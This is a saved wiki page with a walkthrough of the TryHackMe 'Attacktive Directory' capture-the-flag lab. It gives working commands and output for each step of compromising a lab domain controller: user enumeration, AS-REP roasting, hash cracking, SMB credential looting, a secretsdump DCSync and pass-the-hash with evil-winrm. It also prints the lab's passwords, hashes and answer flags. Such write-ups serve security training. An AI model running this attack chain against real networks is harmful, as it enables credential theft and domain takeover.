TryHackMe-Attacktive-Directory - aldeid [Link]

com/wiki/TryHackMe-Attacktive-Directory

TryHackMe-Attacktive-Directory

Contents
Attacktive Directory
[Task 2] Impacket Installation
[Task 3] Enumerate the DC
#3.1 - How many ports are open under 10,000? (Note it may take up to 5 minutes for all the services to
start)
#3.2 - What tool will allow us to enumerate port 139/445?
#3.3 - What is the NetBIOS-Domain Name of the machine?
#3.4 - What invalid TLD do people commonly use for their Active Directory Domain?
[Task 4] Enumerate the DC Pt 2
#4.1 - What command within Kerbrute will allow us to enumerate valid usernames?
#4.2 - What notable account is discovered? (These should jump out at you)
#4.3 - What is the other notable account is discovered? (These should jump out at you)
[Task 5] Exploiting Kerberos
#5.1 - We have two user accounts that we could potentially query a ticket from. Which user account can
you query a ticket from with no password?
#5.2 - Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the
KDC? (Specify the full name)
#5.3 - What mode is the hash?
#5.4 - Now crack the hash with the modified password list provided, what is the user accounts password?
[Task 6] Enumerate the DC Pt 3
#6.1 - Using utility can we map remote SMB shares?
#6.2 - Which option will list shares?
#6.3 - How many remote shares is the server listing?
#6.4 - There is one particular share that we have access to that contains a text file. Which share is it?
#6.5 - What is the content of the file?
#6.6 - Decoding the contents of the file, what is the full contents?
[Task 7] Elevating Privileges
#7.1 - What method allowed us to dump [Link]?
#7.2 - What is the Administrators NTLM hash?
#7.3 - What method of attack could allow us to authenticate as the user without the password?
#7.4 - Using a tool called Evil-WinRM what option will allow us to use a hash?
[Task 8] Flags
#8.1 - svc-admin
#8.2 - backup
#8.3 - Administrator

Attacktive Directory
99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?

[Task 2] Impacket Installation

Introduction

So you’re likely here if you’ve had issues with Impacket. Impacket is moderately frustrating to say the least… A

1 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

lot of people have issues with it, so let’s walk through the Impacket install process!

Installing Impacket

First, you’ll want to clone the repo with:

git clone [Link] /opt/impacket

This will clone Impacket to /opt/impacket/, after the repo is cloned, you will notice several install related files,
[Link], and [Link]. [Link] is commonly skipped during the installation. It’s key that you DO
NOT miss it.

So let’s install the requirements:

pip3 install -r /opt/impacket/[Link]

Once all the python modules are installed, we can then run the python setup install script:

cd /opt/impacket/ && python3 ./[Link] install

After that, Impacket should be correctly installed now and it should be ready to use!

[Task 3] Enumerate the DC

Initial note

Flags for each user account are available for submission. You can retrieve the flags for user accounts via RDP
(Note: the login format is [Link]/User at the Window’s login prompt) and Administrator via Evil-
WinRM.

Basic enumeration tactics will yield a number of ports open. Using a popular enumeration tool that’s built on
Linux 4 Windows will reveal some information, not a lot to work with however.

#3.1 - How many ports are open under 10,000? (Note it may
take up to 5 minutes for all the services to start)
Hint: If Windows is being Windows, there should be 11 ports open.

PORT STATE SERVICE VERSION

53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: [Link]
| DNS_Computer_Name: [Link]
| Product_Version: 10.0.17763
|_ System_Time: 2020-06-20T[Link]+00:00
| ssl-cert: Subject: commonName=[Link]
| Not valid before: 2020-04-03T[Link]
|_Not valid after: 2020-10-03T[Link]
|_ssl-date: 2020-06-20T[Link]+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

2 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49799/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
[Link] :
SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEE0AD5%P=x86_64-redhat-linux-gnu%r(
SF:DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07vers
SF:ion\x04bind\0\0\x10\0\x03");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-20T[Link]
|_ start_date: N/A

I found 10 open ports under 10,000 but the expected answer is 11.

#3.2 - What tool will allow us to enumerate port 139/445?

Answer: enum4linux

#3.3 - What is the NetBIOS-Domain Name of the machine?

$ [Link] [Link]

[REDACTED]

============================================
| Getting domain SID for [Link] |
============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at /data/src/enum4linux-0.8.9/[Link] line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

Answer: THM-AD

#3.4 - What invalid TLD do people commonly use for their

Active Directory Domain?
Hint: Spoiler: The full AD domain is [Link]

Answer: .local

[Task 4] Enumerate the DC Pt 2

Introduction

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within
Active Directory. With this port open, we can use a tool called Kerbrute ([Link]
eleases) (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!

Enumeration

For this box, a modified User List ([Link]

er/[Link]) and Password List ([Link]
er/[Link]) will be used to cut down on time of enumeration of users and password hash cracking. It is
NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the
domain controller.

3 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

#4.1 - What command within Kerbrute will allow us to

enumerate valid usernames?
Hint: ./kerbrute -h may help you

Answer: userenum

#4.2 - What notable account is discovered? (These should jump

out at you)
Add the following line to your /etc/hosts file:

[Link] [Link]

And run kerbrute:

$ ./kerbrute_linux_amd64 userenum --dc [Link] -d [Link] [Link] -t 100

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/20/20 - Ronnie Flathers @ropnop

2020/06/20 [Link] > Using KDC(s):

2020/06/20 [Link] > [Link]

2020/06/20 [Link] > [+] VALID USERNAME: james@[Link]

2020/06/20 [Link] > [+] VALID USERNAME: svc-admin@[Link]
2020/06/20 [Link] > [+] VALID USERNAME: James@[Link]
2020/06/20 [Link] > [+] VALID USERNAME: robin@[Link]
2020/06/20 [Link] > [+] VALID USERNAME: darkstar@[Link]
2020/06/20 [Link] > [+] VALID USERNAME: administrator@[Link]
2020/06/20 [Link] > [+] VALID USERNAME: backup@[Link]

[REDACTED]

Answer: svc-admin

#4.3 - What is the other notable account is discovered? (These

should jump out at you)
Answer: backup

[Task 5] Exploiting Kerberos

Introduction

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an
attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege “Does not
require Pre-Authentication” set. This means that the account does not need to provide valid identification before
requesting a Kerberos Ticket on the specified user account.

Exploitation

Impacket ([Link] has a tool called [Link] (located in

Impacket/Examples/[Link]) that will allow us to query ASReproastable accounts from the Key
Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we
enumerated previously via Kerbrute.

#5.1 - We have two user accounts that we could potentially query

4 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

a ticket from. Which user account can you query a ticket from
with no password?
Kerberos pre-authentication has been disabled for svc-admin:

$ [Link] [Link]/svc-admin -request -no-pass -dc-ip [Link]

Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin

$krb5asrep$23$svc-
admin@[Link]:9e9d37205ca2b017be8b60ae4decc7d8$4d81d588e53cd91588752a3d06537c32d95b9e71c8ad9000bfb2442ae8fdd36a7448fca372de
cebd0d6ef2a0020b5eea2d690503018447cbd9422ff59fe0aa62777c8840112179b56a1971f083ca17ef83a29d4815f86c3c5836420de128f7c9d6975bd367c02b2
f22ce506b61ce0ebaa2a664b59fa40a7fa1d04db8654d62c3f09c803025e270ef112a2f833b4e2d8bc1fe756d58fa734277b25b77e521e57a7a77dc19d517a69270
4f5c68a5593f552bacc82202f44fecf34ddf36f97ed54d65432eef3739fad5b9ce14fbf81b306503b0191dd3eda6ed3e7ade34bb37cc1b3ee16b240369df8fb7cb7
9d367bee2c66b2c

But not for backup:

$ [Link] [Link]/backup -request -no-pass -dc-ip [Link]

Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for backup

[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

Answer: svc-amin

#5.2 - Looking at the Hashcat Examples Wiki page, what type of

Kerberos hash did we retrieve from the KDC? (Specify the full
name)
Hint: [Link] and searching for the first part will help!

Searching for the string krb5asrep on the hashcat hashtype page ([Link]
ple_hashes) reveals that the hash has the following type:

Hash mode: 18200

Hash name: Kerberos 5 AS-REP etype 23

Answer: Kerberos 5 AS-REP etype 23

#5.3 - What mode is the hash?

Answer: 18200

#5.4 - Now crack the hash with the modified password list
provided, what is the user accounts password?
$ hashcat --force -m 18200 -a 0 [Link] /usr/share/wordlists/[Link]
hashcat (v5.1.0) starting...

[REDACTED]

$krb5asrep$23$svc-admin@[Link]:d2c7d46d6[REDACTED]92d7576bad:management2005

Session..........: hashcat
Status...........: Cracked
[Link]........: Kerberos 5 AS-REP etype 23
[Link]......: $krb5asrep$23$svc-admin@[Link]:d2c7d46d607...576bad
[Link].....: Sat Jun 20 [Link] 2020 (15 secs)
[Link]...: Sat Jun 20 [Link] 2020 (0 secs)
[Link].......: File (/usr/share/wordlists/[Link])
[Link]......: 1/1 (100.00%)
Speed.#1.........: 411.8 kH/s (12.40ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts

5 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

Progress.........: 5840896/14344385 (40.72%)

Rejected.........: 0/5840896 (0.00%)
[Link]....: 5832704/14344385 (40.66%)
[Link].#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: mandj4e -> mamitaraquel

Started: Sat Jun 20 [Link] 2020

Stopped: Sat Jun 20 [Link] 2020

The password is management2005

[Task 6] Enumerate the DC Pt 3

Enumeration

With a user’s account credentials we now have significantly more access within the domain. We can now attempt
to enumerate any shares that the domain controller may be giving out.

#6.1 - Using utility can we map remote SMB shares?

Hint: man smbclient will tell you a little bit about the tool!

Using smbclient with the , we are able to list remote shares:

$ smbclient -U [Link]/svc-admin -L //[Link]

Enter [Link]\svc-admin's password:

Sharename Type Comment

--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available

Answer: smbclient

#6.2 - Which option will list shares?

Hint: man smbclient will tell you a little bit about the tool!

Answer: -L

#6.3 - How many remote shares is the server listing?

Answer: 6

#6.4 - There is one particular share that we have access to that

contains a text file. Which share is it?
Let’s connect to the backup share and list the files:

$ smbclient -U [Link]/svc-admin //[Link]/backup

Enter [Link]\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 [Link] 2020
.. D 0 Sat Apr 4 [Link] 2020
backup_credentials.txt A 48 Sat Apr 4 [Link] 2020

8247551 blocks of size 4096. 5269591 blocks available

smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (4.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \>

6 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

#6.5 - What is the content of the file?

Hint: The encoded contents of the file

The text file contains base64 encoded credentials:

$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

#6.6 - Decoding the contents of the file, what is the full

contents?
Decoding the base64 string reveals the credentials:

$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d

backup@[Link]:backup2517860

[Task 7] Elevating Privileges

Introduction

Now that we have new user account credentials, we may have more privileges on the system than before. The
username of the account “backup” gets us thinking. What is this the backup account to?

Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all
Active Directory changes to be synced with this user account. This includes password hashes

Knowing this, we can use another tool within Impacket called [Link]. This will allow us to retrieve all

7 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting
this, we will effectively have full control over the AD Domain.

#7.1 - What method allowed us to dump [Link]?

Hint: Read the secretsdump output!

$ [Link] -dc-ip [Link] [Link]/backup:backup2517860@[Link]

Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get [Link] secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5eb[Link]
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0[Link]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be[Link]
[Link]\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c5[Link]
[Link]\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c5[Link]
[Link]\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c66507106[Link]
[Link]\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f127265[Link]
[Link]\sherlocks[Link]b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b[Link]
[Link]\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a6[Link]
[Link]\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433[Link]
[Link]\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626[Link]
[Link]\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0[Link]
[Link]\Muirlan[Link]b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0f[Link]
[Link]\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b67523[Link]
[Link]\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba[Link]
[Link]\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab4[Link]
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:209193215e7cb3a8579257644d08[Link]
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c431e7e3555aeb5b63cbdfee3024d56f4b7f10eaba6c3f94d9a1524e76a26a49
Administrator:aes128-cts-hmac-sha1-96:f955ac2d89620b2a8dcd9837105445ff
Administrator:des-cbc-md5:6d5edfa173d9d6ae
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
[Link]\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
[Link]\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
[Link]\skidy:des-cbc-md5:b092a73e3d256b1f
[Link]\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
[Link]\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
[Link]\breakerofthings:des-cbc-md5:7a976bbfab86b064
[Link]\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
[Link]\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
[Link]\james:des-cbc-md5:dc971f4a91dce5e9
[Link]\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
[Link]\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
[Link]\optional:des-cbc-md5:8c6e2a8a615bd054
[Link]\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
[Link]\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
[Link]\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
[Link]\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
[Link]\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
[Link]\darkstar:des-cbc-md5:758af4d061381cea
[Link]\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
[Link]\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
[Link]\Ori:des-cbc-md5:1c8f79864654cd4a
[Link]\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
[Link]\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
[Link]\robin:des-cbc-md5:89a7c2fe7a5b9d64
[Link]\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
[Link]\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
[Link]\paradox:des-cbc-md5:83988983f8b34019
[Link]\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
[Link]\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
[Link]\Muirland:des-cbc-md5:cb8a4a3431648c86
[Link]\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
[Link]\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
[Link]\horshark:des-cbc-md5:a823497a7f4c0157
[Link]\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
[Link]\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
[Link]\svc-admin:des-cbc-md5:2c4543ef4646ea0d
[Link]\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
[Link]\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
[Link]\backup:des-cbc-md5:d601e9469b2f6d89
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:35383a0556fcf1c00fde0212d16736953c23b69f2c4ebc76dd519db41b472482
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:17f09fb2e5c8b105143d6479ec32087b
ATTACKTIVEDIREC$:des-cbc-md5:9426b6febf6dc2ab
[*] Cleaning up...

In the above output, we can read that the DRSUAPI method allows to get the [Link] secrets.

[*] Using the DRSUAPI method to get [Link] secrets

8 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

Answer: DRSUAPI

#7.2 - What is the Administrators NTLM hash?

Here is the extract regarding the administrator account:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5eb[Link]

The NTLM hash is e4876a80a723612986d7609aa5ebc12b

#7.3 - What method of attack could allow us to authenticate as

the user without the password?
Answer: pass the hash

#7.4 - Using a tool called Evil-WinRM what option will allow us

to use a hash?
Hint: if Evil-WinRM is not installed, you can do so by issuing gem install evil-winrm

We can pass the administrator’s password NTLM hash directly to evil-winrm to login without knowing the
password.

$ evil-winrm -i [Link] -u administrator -H e4876a80a723612986d7609aa5ebc12b

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd \users

*Evil-WinRM* PS C:\Users> more svc-admin\desktop\[Link]
TryHackMe{K3rb3r0s_Pr3_4uth}

*Evil-WinRM* PS C:\Users> more backup\desktop\[Link]

TryHackMe{B4ckM3UpSc0tty!}

*Evil-WinRM* PS C:\Users> more administrator\desktop\[Link]

TryHackMe{4ctiveD1rectoryM4st3r}

Answer: -H

[Task 8] Flags
Submit the flags for each user account. They can be located on each user’s desktop.

If you enjoyed this box, you may also enjoy my blog post ([Link]

#8.1 - svc-admin
Flag: TryHackMe{K3rb3r0s_Pr3_4uth}

#8.2 - backup
Flag: TryHackMe{B4ckM3UpSc0tty!}

#8.3 - Administrator
Flag: TryHackMe{4ctiveD1rectoryM4st3r}

9 sur 10 01/06/2023, 13:25

TryHackMe-Attacktive-Directory - aldeid [Link]

Retrieved from "[Link]

Share your opinion

This page was last edited on 21 June 2020, at 09:25.

10 sur 10 01/06/2023, 13:25